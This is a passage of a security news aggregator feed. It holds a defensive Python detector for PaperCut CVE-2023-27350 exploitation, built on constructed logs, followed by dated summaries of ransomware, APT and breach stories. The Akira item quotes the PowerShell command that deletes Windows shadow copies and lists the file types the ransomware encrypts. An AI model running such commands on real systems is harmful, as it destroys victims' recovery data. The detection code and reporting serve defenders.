                /windows/temp/socks.exe | 6bb160ebdc59395882ff322e67e000a22a5c54ac777b6b1f10f1fef381df9c15 | Reverse SOCKS5 tunneler with TLS support (see https://github.com/kost/revsocks)
                Using the User/Group Sync interface to execute a living-off-the-land-style attack. "
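                The advisory's three detection ideas, turned into code as an added example (not from CISA, the FBI or Huntress; the access log, process-creation events and PaperCut server log below are constructed, and their field names are assumed): the SetupCompleted request is matched on the decoded service query parameter rather than on a raw substring, so a percent-encoded form is still caught; the process-creation check walks the full parent chain rather than only the direct parent, which covers the evasion the advisory describes of inserting an extra process between pc-app.exe and the interpreter; and the server log is scanned for the config-key and script changes listed above.

```python
"""PaperCut CVE-2023-27350 detections from the advisory, as runnable code.

Added example, not code from CISA, the FBI or Huntress. The sample access log,
process-creation events and PaperCut server log below are constructed, and
their field names are assumed for illustration only.
"""
from __future__ import annotations

import re
from urllib.parse import parse_qs, urlsplit

SETUP_COMPLETED_PAGE = "page/SetupCompleted"   # URI from the advisory's Suricata rules
PAPERCUT_PROCESS = "pc-app.exe"
INTERPRETERS = {"cmd.exe", "powershell.exe"}
# Server log entries the advisory lists as indicative of compromise
# (quote style in a real log may differ; straight quotes are assumed here).
SUSPICIOUS_LOG_PATTERNS = [
    re.compile(r'User "admin" updated the config key "(print|device)\.script\.sandboxed"'),
    re.compile(r'Admin user "admin" modified the print script on printer'),
    re.compile(r'User/Group Sync settings changed by "admin"'),
]
ACCESS_LOG_RE = re.compile(r'(\S+) \S+ \S+ \[[^\]]+\] "(\w+) (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed sample data (common log format; EDR-style process events).
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [20/Apr/2023:02:14:07 +0000] "GET /app?service=page/SetupCompleted HTTP/1.1" 200
10.0.0.5 - - [20/Apr/2023:02:14:09 +0000] "GET /app?service=page%2FSetupCompleted HTTP/1.1" 200
10.0.0.9 - - [20/Apr/2023:02:15:01 +0000] "GET /app?service=page/UserWebLogin HTTP/1.1" 200
10.0.0.7 - - [20/Apr/2023:02:16:30 +0000] "POST /app?service=direct/1/Home/$Form HTTP/1.1" 302
"""

SAMPLE_PROCESS_EVENTS = [
    {"pid": 4100, "ppid": 900, "image": r"C:\Program Files\PaperCut NG\server\bin\win\pc-app.exe"},
    {"pid": 4188, "ppid": 4100, "image": r"C:\Windows\System32\cmd.exe"},       # direct child
    {"pid": 4200, "ppid": 4100, "image": r"C:\Windows\System32\wscript.exe"},   # inserted hop
    {"pid": 4212, "ppid": 4200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"pid": 5000, "ppid": 700, "image": r"C:\Windows\explorer.exe"},
    {"pid": 5010, "ppid": 5000, "image": r"C:\Windows\System32\cmd.exe"},       # unrelated admin shell
]

SAMPLE_SERVER_LOG = """\
2023-04-20 02:14:12 INFO User "admin" updated the config key "print.script.sandboxed"
2023-04-20 02:14:13 INFO User "admin" updated the config key "device.script.sandboxed"
2023-04-20 02:14:40 INFO Admin user "admin" modified the print script on printer "HQ-Floor2"
2023-04-20 02:15:02 INFO User/Group Sync settings changed by "admin"
2023-04-20 02:20:00 INFO User "jsmith" printed 3 pages on "HQ-Floor2"
"""


def http_bypass_hits(access_log: str) -> list[str]:
    """Client IPs that issued GET /app?service=page/SetupCompleted.

    The service parameter is compared after URL decoding, so the
    percent-encoded form page%2FSetupCompleted is caught as well.
    """
    hits = []
    for line in access_log.splitlines():
        m = ACCESS_LOG_RE.match(line)
        if not m:
            continue
        ip, method, target, _status = m.groups()
        services = parse_qs(urlsplit(target).query).get("service", [])
        if method == "GET" and SETUP_COMPLETED_PAGE in services:
            hits.append(ip)
    return hits


def _basename(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()


def interpreters_descended_from_papercut(events: list[dict]) -> list[dict]:
    """cmd.exe/powershell.exe events with pc-app.exe anywhere in their ancestry.

    Walking the whole parent chain, not just the immediate parent, defeats the
    trick of launching an intermediate process between pc-app.exe and the shell.
    """
    by_pid = {e["pid"]: e for e in events}
    flagged = []
    for event in events:
        if _basename(event["image"]) not in INTERPRETERS:
            continue
        visited = set()
        parent = by_pid.get(event["ppid"])
        while parent is not None and parent["pid"] not in visited:  # guard against pid-reuse loops
            visited.add(parent["pid"])
            if _basename(parent["image"]) == PAPERCUT_PROCESS:
                flagged.append(event)
                break
            parent = by_pid.get(parent["ppid"])
    return flagged


def suspicious_papercut_log_lines(server_log: str) -> list[str]:
    """PaperCut application-log lines matching the advisory's indicators."""
    return [line for line in server_log.splitlines()
            if any(p.search(line) for p in SUSPICIOUS_LOG_PATTERNS)]
```

                Against the constructed data, the access-log check reports both requests from 10.0.0.5, the process check flags the direct cmd.exe child and the powershell.exe reached through wscript.exe while leaving the explorer.exe-spawned shell alone, and four of the five server-log lines match. A real deployment would feed these functions from the web server's access log, the EDR's process telemetry and PaperCut's server.log respectively.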


                Experts Detail New Zero-Click Windows Vulnerability for NTLM Credential Theft

                exploits
                2023-05-10 https://thehackernews.com/2023/05/experts-detail-new-zero-click-windows.html
                Cybersecurity researchers have shared details about a now-patched security flaw in Windows MSHTML platform that could be abused to bypass integrity protections on targeted machines. The vulnerability, tracked as CVE-2023-29324 (CVSS score: 6.5), has been described as a security feature bypass. It was addressed by Microsoft as part of its Patch Tuesday updates for May 2023. Akamai security "

                Autosummary: Akamai security researcher Ben Barnea, who discovered and reported the bug, noted that all Windows versions are affected, but pointed out that Microsoft Exchange servers with the March update omit the vulnerable feature. "


                Sophisticated DownEx Malware Campaign Targeting Central Asian Governments

                exploits government
                2023-05-10 https://thehackernews.com/2023/05/sophisticated-downex-malware-campaign.html
                Government organizations in Central Asia are the target of a sophisticated espionage campaign that leverages a previously undocumented strain of malware dubbed DownEx. Bitdefender, in a report shared with The Hacker News, said the activity remains active, with evidence likely pointing to the involvement of Russia-based threat actors. The Romanian cybersecurity firm said it first detected the "

                Autosummary: This includes two C/C++-based binaries (wnet.exe and utility.exe) to enumerate all the resources on a network; a Python script (help.py) to establish an infinite communication loop with the C2 server and receive instructions to steal files with certain extensions, delete files created by other malware, and capture screenshots; and a C++-based malware (diagsvc.exe, aka DownEx) that's chiefly designed to exfiltrate files to the C2 server. "


                U.S. Government Neutralizes Russia's Most Sophisticated Snake Cyber Espionage Tool

                government
                2023-05-10 https://thehackernews.com/2023/05/us-government-neutralizes-russias-most.html
                The U.S. government on Tuesday announced the court-authorized disruption of a global network compromised by an advanced malware strain known as Snake wielded by Russia's Federal Security Service (FSB). Snake, dubbed the "most sophisticated cyber espionage tool," is the handiwork of a Russian state-sponsored group called Turla (aka Iron Hunter, Secret Blizzard, SUMMIT, Uroburos, Venomous Bear,

                Autosummary: Infrastructure associated with the Kremlin-backed group has been identified in over 50 countries across North America, South America, Europe, Africa, Asia, and Australia, although its targeting is assessed to be more tactical, encompassing government networks, research facilities, and journalists.


                Microsoft's May Patch Tuesday Fixes 38 Flaws, Including 2 Exploited Zero-Day Bugs

                exploits
                2023-05-10 https://thehackernews.com/2023/05/microsofts-may-patch-tuesday-fixes-38.html
                Microsoft has rolled out Patch Tuesday updates for May 2023 to address 38 security flaws, including two zero-day bugs that it said are being actively exploited in the wild. Trend Micro's Zero Day Initiative (ZDI) said the volume is the lowest since August 2021, although it pointed out that "this number is expected to rise in the coming months." Of the 38 vulnerabilities, six are rated Critical

                Autosummary: Software Patches from Other Vendors: In addition to Microsoft, security updates have also been released by other vendors over the past few weeks to rectify several vulnerabilities, including — (The story has been updated after publication to mention that the Patch Tuesday release fixes two actively exploited zero-day bugs, and not one as previously stated.)


                Renewable energy projects worth billions stuck on hold

                industry
                2023-05-10 https://www.bbc.co.uk/news/science-environment-65500339?at_medium=RSS&at_campaign=KARANGA
                Major UK renewable energy projects being delayed by more than 10 years as grid reaches capacity.


                New Ransomware Strain "CACTUS" Exploits VPN Flaws to Infiltrate Networks

                exploits ransomware
                2023-05-09 https://thehackernews.com/2023/05/new-ransomware-strain-cactus-exploits.html
                Cybersecurity researchers have shed light on a new ransomware strain called CACTUS that has been found to leverage known flaws in VPN appliances to obtain initial access to targeted networks. "Once inside the network, CACTUS actors attempt to enumerate local and network user accounts in addition to reachable endpoints before creating new user accounts and leveraging custom scripts to automate

                Autosummary: CACTUS and Rapture are the latest additions to a long list of new ransomware families that have come to light in recent weeks, including Gazprom, BlackBit, UNIZA, Akira, and a NoCry ransomware variant called Kadavro Vector.


                Iran-linked APT groups started exploiting Papercut flaw

                exploits
                2023-05-09 https://securityaffairs.com/145952/apt/iranian-apt-papercut-exploitation.html

                Microsoft warns of Iran-linked APT groups that are targeting vulnerable PaperCut MF/NG print management servers. Microsoft warns that Iran-linked APT groups have been observed exploiting the CVE-2023-27350 flaw in attacks against PaperCut MF/NG print management servers. The CVE-2023-27350 flaw is a PaperCut MF/NG Improper Access Control Vulnerability. PaperCut MF/NG contains an improper access control vulnerability within the […]

                The post Iran-linked APT groups started exploiting Papercut flaw appeared first on Security Affairs.



                Finding bugs in AI models at DEF CON 31

                exploits
                2023-05-09 https://www.helpnetsecurity.com/2023/05/09/finding-bugs-ai-models/

                DEF CON’s AI Village will host the first public assessment of large language models (LLMs) at the 31st edition of the hacker convention this August, aimed at finding bugs in AI models and uncovering their potential for misuse. LLMs offer countless ways to assist users’ creativity, but they also present challenges, particularly in terms of security and privacy. This event could shed light on the implications of …

                The post Finding bugs in AI models at DEF CON 31 appeared first on Help Net Security.

                Autosummary: During the conference, red teams will put LLMs from some of the leading vendors, such as Anthropic, Google, Hugging Face, NVIDIA, OpenAI, Stability, and Microsoft, to the test.


                Microsoft Warns of State-Sponsored Attacks Exploiting Critical PaperCut Vulnerability

                exploits government
                2023-05-09 https://thehackernews.com/2023/05/microsoft-warns-of-state-sponsored.html
                Iranian nation-state groups have now joined financially motivated actors in actively exploiting a critical flaw in PaperCut print management software, Microsoft said. The tech giant's threat intelligence team said it observed both Mango Sandstorm (Mercury) and Mint Sandstorm (Phosphorus) weaponizing CVE-2023-27350 in their operations to achieve initial access. "This activity shows Mint

                Autosummary: The ongoing assault comes weeks after Microsoft confirmed the involvement of Lace Tempest, a cybercrime gang that overlaps with other hacking groups like FIN11, TA505, and Evil Corp, in abusing the flaw to deliver Cl0p and LockBit ransomware.


                New CACTUS ransomware appeared in the threat landscape

                exploits ransomware
                2023-05-09 https://securityaffairs.com/145960/malware/new-cactus-ransomware.html

                Researchers warn of a new ransomware family called CACTUS that exploits known vulnerabilities in VPN appliances to gain initial access to victims’ networks. Researchers from cybersecurity firm Kroll have analyzed a new ransomware family called CACTUS that has been spotted exploiting known flaws in VPN appliances to achieve initial access to targeted networks. The […]



                Critical Ruckus RCE flaw exploited by new DDoS botnet malware

                exploits
                2023-05-09 https://www.bleepingcomputer.com/news/security/critical-ruckus-rce-flaw-exploited-by-new-ddos-botnet-malware/
                A new malware botnet named "AndoryuBot" is targeting a critical-severity flaw in the Ruckus Wireless Admin panel to infect unpatched Wi-Fi access points for use in DDoS attacks. [...]

                Autosummary: The AndoryuBot malware supports 12 DDoS attack modes: tcp-raw, tcp-socket, tcp-cnc, tcp-handshake, udp-plain, udp-game, udp-ovh, udp-raw, udp-vse, udp-dstat, udp-bypass, and icmp-echo.


                Food distribution giant Sysco warns of data breach after cyberattack

                financial ciber
                2023-05-09 https://www.bleepingcomputer.com/news/security/food-distribution-giant-sysco-warns-of-data-breach-after-cyberattack/
                Sysco, a leading global food distribution company, has confirmed that its network was breached earlier this year by attackers who stole sensitive information, including business, customer, and employee data. [...]


                Microsoft fixes Secure Boot zero-day used by BlackLotus UEFI malware

                exploits
                2023-05-09 https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-secure-boot-zero-day-used-by-blacklotus-uefi-malware/
                Microsoft has released security updates to address a Secure Boot zero-day vulnerability exploited by BlackLotus UEFI malware to infect fully patched Windows systems. [...]


                Microsoft May 2023 Patch Tuesday fixes 3 zero-days, 38 flaws

                exploits
                2023-05-09 https://www.bleepingcomputer.com/news/microsoft/microsoft-may-2023-patch-tuesday-fixes-3-zero-days-38-flaws/
                Today is Microsoft's May 2023 Patch Tuesday, and security updates fix three zero-day vulnerabilities and a total of 38 flaws. [...]


                FBI nukes Russian Snake data theft malware with self-destruct command

                exploits rusia-ucrania
                2023-05-09 https://www.bleepingcomputer.com/news/security/fbi-nukes-russian-snake-data-theft-malware-with-self-destruct-command/
                Cybersecurity and intelligence agencies from all Five Eyes member nations took down the infrastructure used by the Snake cyber-espionage malware operated by Russia's Federal Security Service (FSB). [...]


                Spanish police dismantle phishing operation linked to crime ring

                financial
                2023-05-09 https://www.bleepingcomputer.com/news/security/spanish-police-dismantle-phishing-operation-linked-to-crime-ring/
                The National Police of Spain have arrested two hackers, 15 members of a criminal organization, and another 23 people involved in illegal financial operations in Madrid and Seville for alleged bank scams. [...]

                Autosummary: "40 people have been arrested, accused of the crimes of belonging to a criminal organization, bank scam, documentary falsification, identity theft, and money laundering," reads the police's announcement.


                Microsoft issues optional fix for Secure Boot zero-day used by malware

                exploits
                2023-05-09 https://www.bleepingcomputer.com/news/microsoft/microsoft-issues-optional-fix-for-secure-boot-zero-day-used-by-malware/
                Microsoft has released security updates to address a Secure Boot zero-day vulnerability exploited by BlackLotus UEFI malware to infect fully patched Windows systems. [...]

                Autosummary: "To protect against this attack, a fix for the Windows boot manager (CVE-2023-24932) is included in the May 9, 2023, security update release, but disabled by default and will not provide protections," the company said.


                Ransomware attack on MSI led to compromised Intel Boot Guard private keys

                exploits
                2023-05-09 https://www.malwarebytes.com/blog/news/2023/05/ransomware-attack-on-msi-led-to-compromised-intel-boot-guard-private-keys

                Categories: News, Ransomware. Tags: MSI, Intel, Boot Guard, firmware updates, Money Message

                The leaked data after the ransomware attack on MSI includes private keys which could be used to bypass Intel Boot Guard


                The post Ransomware attack on MSI led to compromised Intel Boot Guard private keys appeared first on Malwarebytes Labs.


                Autosummary: According to BleepingComputer, a Money Message operator said in a chat with an MSI agent: “Say your manager, that we have MSI source code, including framework to develop bios, also we have private keys able to sign in any custom module of those BIOS and install it on PC with this bios.” Although no attacks of this kind have been found in the wild, and Binarly, after a lengthy and detailed analysis, states that “the leaked Boot Guard keys are intended for debug building lines and most likely we will never see such devices in the wild,” the advice to obtain firmware/BIOS updates only from official vendor websites is solid. Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.


                What the NHS is learning from Brazil

                latam
                2023-05-09 https://www.bbc.co.uk/news/health-65530272?at_medium=RSS&at_campaign=KARANGA
                Will a healthcare approach that has been successful in poorer parts of Brazil work in the UK?


                Lessons from a 40-year-long automotive OEM leader

                industry
                2023-05-08 https://www.helpnetsecurity.com/2023/05/08/paul-cha-lg-podcast/

                Paul Cha is a cyber and product security leader, serving as the VP of Cybersecurity at LG Electronics Vehicle component Solutions. Paul held critical positions at Synopsys, Ford Motor Company, and Samsung before joining LG. He found his way to cybersecurity while working on his Ph.D. in risk management. Paul started his career in cyber security work as a senior security solution development engineer, where he focused on smart appliances such as smart TVs and …

                Autosummary: As most manufacturers have complicated supply chain requirements and are moving toward software and cloud solutions, it becomes harder to handle complicated security issues. The product security industry becomes more difficult as the world becomes more interconnected. As such, product security teams must continuously run TARA (threat analysis and risk assessment) activities to enhance the quality of the product’s security.


                Uber’s ex-CSO avoids prison after data breach cover up

                financial
                2023-05-08 https://www.bitdefender.com/blog/hotforsecurity/ubers-ex-cso-avoids-prison-after-data-breach-cover-up/
                After covering up a data breach that impacted the personal records of 57 million Uber passengers and drivers, the company's former Chief Security Officer has been found guilty and sentenced by a US federal judge. Read more in my article on the Hot for Security blog.


                Your voice could be your biggest vulnerability

                exploits
                2023-05-08 https://www.helpnetsecurity.com/2023/05/08/ai-voice-scam/

                AI technology is fueling a rise in online voice scams, with just three seconds of audio required to clone a person’s voice, according to McAfee. McAfee surveyed 7,054 people from seven countries and found that a quarter of adults had previously experienced some kind of AI voice scam, with 1 in 10 targeted personally and 15% saying it happened to someone they know. 77% of victims said they had lost money as a result. In …

                Autosummary: Using the cloning tools they found, McAfee’s researchers discovered that they had no trouble replicating accents from around the world, whether they were from the US, UK, India, or Australia, but more distinctive voices were more challenging to copy. 45% of the respondents said they would reply to a voicemail or voice note purporting to be from a friend or loved one in need of money, particularly if they thought the request had come from their partner or spouse (40%), parent (31%), or child (20%).


                CERT-UA Warns of SmokeLoader and RoarBAT Malware Attacks Against Ukraine

                exploits
                2023-05-08 https://thehackernews.com/2023/05/cert-ua-warns-of-smokeloader-and.html
                An ongoing phishing campaign with invoice-themed lures is being used to distribute the SmokeLoader malware in the form of a polyglot file, according to the Computer Emergency Response Team of Ukraine (CERT-UA). The emails, per the agency, are sent using compromised accounts and come with a ZIP archive that, in reality, is a polyglot file containing a decoy document and a JavaScript file. The

                Autosummary: "It was found that the operability of electronic computers (server equipment, automated user workplaces, data storage systems) was impaired as a result of the destructive impact carried out with the use of appropriate software," CERT-UA said.


                Chile constitution: Far-right party biggest in new assembly

                latam
                2023-05-08 https://www.bbc.co.uk/news/world-latin-america-65524068?at_medium=RSS&at_campaign=KARANGA
                A far-right party comes first in a vote to choose those tasked with drawing up a new constitution.


                QR codes used in fake parking tickets, surveys to steal your money

                financial
                2023-05-08 https://www.bleepingcomputer.com/news/security/qr-codes-used-in-fake-parking-tickets-surveys-to-steal-your-money/
                As QR codes continue to be heavily used by legitimate organizations, from Super Bowl advertisements to enforcing parking fees and fines, scammers have crept in to abuse the very same technology for their nefarious purposes. A woman in Singapore reportedly lost $20,000 after using a QR code to fill out a "survey" at a bubble tea shop. [...]

                Autosummary: "Please watch out, if you received one like this, toss it out because the QR code links to your bank account," warns the user, who shared a picture of the fake parking ticket with a QR code seen in San Francisco (Reddit). Interestingly, the ticket seen on or before May 4th was dated in the future (May 5th), which would raise red flags. "However, the Singpass QR code provided by the scammers was a screenshot taken from a legitimate website, and by scanning the QR code and authorising the transaction without further checks, victims unintentionally gave the perpetrators access to certain online services," states the police warning.


                Join Our Webinar: Learn How to Defeat Ransomware with Identity-Focused Protection

                exploits ransomware
                2023-05-08 https://thehackernews.com/2023/05/join-our-webinar-learn-how-to-defeat.html
                Are you concerned about ransomware attacks? You're not alone. In recent years, these attacks have become increasingly common and can cause significant damage to organizations of all sizes. But there's good news - with the right security measures in place, such as real-time MFA and service account protection, you can effectively protect yourself against these types of attacks. That's why we're

                Autosummary: During this webinar, Yiftach will share his insights on how real-time MFA and service account protection can defeat ransomware attacks, and why identity-focused protection is the only way to stop lateral movement and ransomware spread.


                MSI Data Breach: Private Code Signing Keys Leaked on the Dark Web

                financial
                2023-05-08 https://thehackernews.com/2023/05/msi-data-breach-private-code-signing.html
                The threat actors behind the ransomware attack on Taiwanese PC maker MSI last month have leaked the company's private code signing keys on their dark website. "Confirmed, Intel OEM private key leaked, causing an impact on the entire ecosystem," Alex Matrosov, founder and CEO of firmware security firm Binarly, said in a tweet over the weekend. "It appears that Intel Boot Guard may not be


                Western Digital notifies customers of data breach after March cyberattack

                financial ciber
                2023-05-08 https://securityaffairs.com/145922/data-breach/western-digital-data-breach.html

                Western Digital is notifying its customers of a data breach that exposed their sensitive personal information; the incident took place in March. In March 2022, Western Digital was hit by a ransomware attack and, in response to the incident, it shut down several of its services. The company disclosed that an unauthorized party gained access […]

                Autosummary: “Western Digital is currently experiencing a service outage impacting the following products: My Cloud, My Cloud Home, My Cloud Home Duo, My Cloud OS5, SanDisk ibi, SanDisk Ixpand Wireless Charger,” reads the company's status page on April 2, 2023.


                NextGen Healthcare suffered a data breach that impacted +1 Million individuals

                financial
                2023-05-08 https://securityaffairs.com/145935/data-breach/nextgen-healthcare-data-breach.html

                NextGen Healthcare suffered a data breach; the security incident exposed the personal information of approximately 1 million individuals. Healthcare solutions provider NextGen Healthcare suffered a data breach that exposed the personal information of approximately one million individuals. NextGen Healthcare, Inc. is an American software and services company that develops and sells electronic health record (EHR) software and practice management systems to […]



                King Charles III as head of state in St Vincent and the Grenadines "absurd"

                government
                2023-05-08 https://www.bbc.co.uk/news/world-65527160?at_medium=RSS&at_campaign=KARANGA
                Ralph Gonsalves says he would welcome an apology for injustices related to slavery.


                Money Message gang leaked private code signing keys from MSI data breach

                financial
                2023-05-08 https://securityaffairs.com/145940/data-breach/msi-data-breach-key-leaked.html

                The ransomware gang behind the attack on Taiwanese PC maker MSI leaked the company’s private code signing keys on their dark web leak site. In early April, the ransomware gang Money Message announced that it had hacked the Taiwanese multinational IT corporation MSI (Micro-Star International). Micro-Star International, aka MSI, designs, manufactures, and sells motherboards and graphics cards […]

                Autosummary: According to Binarly, the exposed devices include multiple MSI laptop model series, including Stealth, Creator, Crosshair, Katana, Modern, Prestige, Pulse, Raider, Sword, Summit, Vector.


                Apple co-founder says AI may make scams harder to spot

                financial
                2023-05-08 https://www.bbc.co.uk/news/technology-65496150?at_medium=RSS&at_campaign=KARANGA
                Silicon Valley veteran tells the BBC he thinks AI creations should be clearly labelled.


                Can a wind turbine handle hurricane speed winds?

                industry
                2023-05-08 https://www.bbc.co.uk/news/business-65261147?at_medium=RSS&at_campaign=KARANGA
                As wind farms expand into new areas they will need to withstand extreme wind speeds.


                Ransomware review: May 2023

                exploits
                2023-05-08 https://www.malwarebytes.com/blog/threat-intelligence/2023/05/ransomware-review-may-2023

                LockBit maintained its position as the top ransomware attacker and was also observed expanding into the Mac space.


                Autosummary: Charts in the original show known ransomware attacks by gang, by country, and by industry sector for April 2023. Cl0p ransomware, which gained prominence in March by exploiting a zero-day vulnerability in GoAnywhere MFT, went comparatively silent with just four attacks in April. Among the new players, Akira is a fresh ransomware hitting enterprises globally since March 2023, having already published in April the data of nine companies across different sectors like education, finance, and manufacturing. The LockBit macOS samples analyzed by Malwarebytes seem ineffective due to being unsigned, not accounting for TCC/SIP restrictions, and being riddled with bugs, like buffer overflows, causing premature termination when executed on macOS. As Vice Society, Play, and other ransomware groups increasingly adopt advanced LOTL methods and sophisticated tools like Grixba, the capacity to proactively identify both malicious tools and the malicious use of legitimate tools within a network will undoubtedly become the deciding factor in an organization's defense strategy moving forward.


                The rise of "Franken-ransomware," with Allan Liska: Lock and Code S04E11

                exploits
                2023-05-08 https://www.malwarebytes.com/blog/podcast/2023/05/deraasing-ransomware-with-allan-liska

                This week on Lock and Code, we speak with Allan Liska about a new trend in ransomware delivery and development, and why it presents new challenges to organizations and law enforcement investigators.

                Autosummary: Instead, it is used almost "on loan" by criminal groups called "affiliates" who carry out attacks with the ransomware and, if successful, pay a share of their ill-gotten gains back to the ransomware’s creators.


                Laureus Sport Awards: Lionel Messi & Argentina World Cup team win Laureus awards

                latam
                2023-05-08 https://www.bbc.co.uk/sport/65528208?at_medium=RSS&at_campaign=KARANGA
                Lionel Messi and his World Cup-winning Argentina team complete a double by winning Sportsman and Team of the Year at the Laureus World Sports Awards.

                Autosummary: Shelly-Ann Fraser-Pryce has won 10 outdoor world sprint titles, including relays. Fraser-Pryce's 100m gold came 13 years after her first, and the 36-year-old has more world sprint titles than any other athlete.


                Meet Akira — A new ransomware operation targeting the enterprise

                exploits ransomware
                2023-05-07 https://www.bleepingcomputer.com/news/security/meet-akira-a-new-ransomware-operation-targeting-the-enterprise/
                The new Akira ransomware operation has slowly been building a list of victims as they breach corporate networks worldwide, encrypt files, and then demand million-dollar ransoms. [...]

                Autosummary: When executed, Akira will delete Windows Shadow Volume Copies on the device by running the following PowerShell command: powershell.exe -Command "Get-WmiObject Win32_Shadowcopy | Remove-WmiObject" The ransomware will then proceed to encrypt files that have the following file extensions: .accdb, .accde, .accdc, .accdt, .accdr, .adb, .accft, .adf, .ade, .arc, .adp, .alf, .ora, .btr, .ask, .cat, .bdf, .ckp, .cdb, .cpd, .cma, .dad, .dacpac, .daschema, .dadiagrams, .db-shm, .db-wal, .dbf, .dbc, .dbt, .dbs, .dbx, .dbv, .dct, .dcb, .ddl, .dcx, .dlis, .dsk, .dqy, .dtsx, .dsn, .eco, .dxl, .edb, .ecx, .exb, .epim, .fdb, .fcd, .fmp, .fic, .fmpsl, .fmp12, .fol, .fpt, .gdb, .frm, .gwi, .grdb, .his, .hdb, .idb, .itdb, .ihx, .jet, .itw, .kdb, .jtx, .kexic, .kexi, .lgc, .kexis, .maf, .lwx, .mar, .maq, .mav, .mas, .mdf, .mdb, .mrg, .mpd, .mwb, .mud, .ndf, .myd, .nrmlib, .nnt, .nsf, .nyf, .nwdb, .oqy, .odb, .owc, .orx, .pdb, .pan, .pnz, .pdm, .qvd, .qry, .rctd, .rbf, .rodx, .rod, .rsd, .rpd, .sbf, .sas7bdat, .sdb, .scx, .sdf, .sdc, .spq, .sis, .sqlite, .sql, .sqlitedb, .sqlite3, .temx, .tps, .tmd, .trm, .trc, .udl, .udb, .usr, .vpd, .vis, .wdb, .vvv, .wrk, .wmdb, .xld, .xdb, .abcddb, .xmlff, .abx, .abs, .adn, .accdw, .icg, .hjt, .kdb, .icr, .maw, .lut, .mdt, .mdn, .vhd, .vdi, .pvm, .vmdk, .vmsn, .vmem, .nvram, .vmsd, .raw, .vmx, .subvol, .qcow2, .vsv, .bin, .vmrs, .avhd, .avdx, .vhdx, .iso, .vmcx. While encrypting, the encryptor will skip files found in the Recycle Bin, System Volume Information, Boot, ProgramData, and Windows folders.


                New Cactus ransomware encrypts itself to evade antivirus

                exploits ransomware
                2023-05-07 https://www.bleepingcomputer.com/news/security/new-cactus-ransomware-encrypts-itself-to-evade-antivirus/
                A new ransomware operation called Cactus has been exploiting vulnerabilities in VPN appliances for initial access to networks of "large commercial entities." [...]

                Autosummary: This is explicit in the ransom note, which threatens to publish the stolen data (source: Kroll). Extensive details about the Cactus operation, the victims they target, and whether the hackers keep their word and provide a reliable decryptor if paid, are not available at this time. In a technical report, Kroll investigators explain that there are three main modes of execution, each one selected with the use of a specific command line switch: setup (-s), read configuration (-r), and encryption (-i).


                Western Digital says hackers stole customer data in March cyberattack

                ciber
                2023-05-07 https://www.bleepingcomputer.com/news/security/western-digital-says-hackers-stole-customer-data-in-march-cyberattack/
                Western Digital has taken its store offline and sent customers data breach notifications after confirming that hackers stole sensitive personal information in a March cyberattack. [...]



                San Bernardino County Sheriff’s Department paid a $1.1M ransom

                government
                2023-05-07 https://securityaffairs.com/145892/cyber-crime/san-bernardino-county-sheriff-paid-ransom.html

                The San Bernardino County Sheriff’s Department confirmed that it has paid a $1.1-million ransom after the April ransomware attack. The San Bernardino County Sheriff’s Department opted to pay a $1.1-million ransom after a ransomware attack infected its systems in early April. The ransomware attack forced the Police department to temporarily shut down some of its […]

                The post San Bernardino County Sheriff’s Department paid a $1.1M ransom appeared first on Security Affairs.




                Gold mine fire kills at least 27 in Peru

                latam
                2023-05-07 https://www.bbc.co.uk/news/world-latin-america-65518526?at_medium=RSS&at_campaign=KARANGA
                The blaze broke out while workers were about 100 metres underground, officials say.



                Che Guevara: Bolivian General Gary Prado Salmón who captured revolutionary dies

                latam
                2023-05-07 https://www.bbc.co.uk/news/world-latin-america-65522061?at_medium=RSS&at_campaign=KARANGA
                Gary Prado Salmón led troops who caught the famous Cuban revolutionary in the Bolivian jungle in 1967.



                Mexico claims proof of Chinese fentanyl smuggling

                latam
                2023-05-06 https://www.bbc.co.uk/news/world-latin-america-65506087?at_medium=RSS&at_campaign=KARANGA
                President López Obrador says he wants China to help fight the deadly opioid ravaging the US.



                New Vulnerability in Popular WordPress Plugin Exposes Over 2 Million Sites to Cyberattacks

                exploits ciber
                2023-05-06 https://thehackernews.com/2023/05/new-vulnerability-in-popular-wordpress.html
                Users of the Advanced Custom Fields plugin for WordPress are being urged to update to version 6.1.6 following the discovery of a security flaw. The issue, assigned the identifier CVE-2023-30777, relates to a case of reflected cross-site scripting (XSS) that could be abused to inject arbitrary executable scripts into otherwise benign websites. The plugin, which is available both as a free and pro

                Autosummary: "This vulnerability allows any unauthenticated user from stealing sensitive information to, in this case, privilege escalation on the WordPress site by tricking a privileged user to visit the crafted URL path," Patchstack researcher Rafie Muhammad said.


                New PaperCut RCE exploit created that bypasses existing detections

                exploits
                2023-05-06 https://www.bleepingcomputer.com/news/security/new-papercut-rce-exploit-created-that-bypasses-existing-detections/
                A new proof-of-concept (PoC) exploit for an actively exploited PaperCut vulnerability was released that bypasses all known detection rules. [...]

                Autosummary: Since then, multiple security companies have released detection rules for PaperCut exploits and indicators of compromise, including detections via Sysmon, log files, and network signatures.


                Dragon Breath APT Group Using Double-Clean-App Technique to Target Gambling Industry

                industry
                2023-05-06 https://thehackernews.com/2023/05/dragon-breath-apt-group-using-double.html
                An advanced persistent threat (APT) actor known as Dragon Breath has been observed adding new layers of complexity to its attacks by adopting a novel DLL side-loading mechanism. "The attack is based on a classic side-loading attack, consisting of a clean application, a malicious loader, and an encrypted payload, with various modifications made to these components over time," Sophos researcher

                Autosummary: The double-dip DLL side-loading strategy, per Sophos, has been leveraged in attacks targeting users in the Philippines, Japan, Taiwan, Singapore, Hong Kong, and China.


                Think your data has no value? Scammers disagree

                financial
                2023-05-05 https://www.helpnetsecurity.com/2023/05/05/q1-2023-phishing-attempts/

                In the first quarter of 2023 there was a significant increase in cyberattacks exploiting trust in established tech brands Microsoft and Adobe, according to Avast. The Avast report also found a 40% rise in the share of phishing and smishing attacks over the previous year. Overall, two out of three threats people encounter online today use social engineering techniques, taking advantage of human weaknesses. Malware, scams, and phishing attacks attempt … More

                The post Think your data has no value? Scammers disagree appeared first on Help Net Security.


                Autosummary: Malware, scams, and phishing attacks attempt to steal consumers’ sensitive data, like passwords, Social Security numbers, and other personal identifiable information. “Unfortunately, scammers have made it nearly impossible to take any message as face value – all communications, whether seemingly from a friend, boss, or household brand, have potential to be fraudulent.”


                Cisco Warns of Vulnerability in Popular Phone Adapter, Urges Migration to Newer Model

